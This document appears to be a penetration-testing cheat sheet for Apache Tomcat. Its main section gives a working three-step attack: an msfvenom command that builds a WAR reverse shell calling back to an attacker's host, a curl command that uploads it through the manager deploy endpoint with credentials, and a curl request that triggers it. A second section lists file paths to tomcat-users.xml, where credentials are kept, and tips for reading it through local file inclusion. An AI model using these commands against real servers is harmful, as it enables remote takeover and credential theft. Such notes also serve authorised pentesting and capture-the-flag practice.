Tomcat

• Exploit manager-script privileges
• tomcat-users.xml

Exploit manager-script privileges

• Generate a WAR reverse shell

  msfvenom -p java/shell_reverse_tcp LHOST=${ip} LPORT=${port} -f war -o shell.war
  

• Upload the shell

  curl -v -u ${user}:${password} --upload-file shell.war 'http://${url}:${port}/manager/text/deploy?path
  =/foo&update=true'
  

• Trigger the shell

  curl http://${url}:${port}/foo
  

tomcat-users.xml

Possible paths :

$CATALINA_HOME/conf/tomcat-users.xml
/usr/share/tomcat9/conf/tomcat-users.xml
/usr/share/tomcat9/etc/tomcat-users.xml

IF RETRIEVED THROUGH LFI USE CURL OR VIEW SOURCE PAGE AS THE FILE IS AN XML FILE AND WILL NOT BE DISPLAYED BY THE NAVIGATOR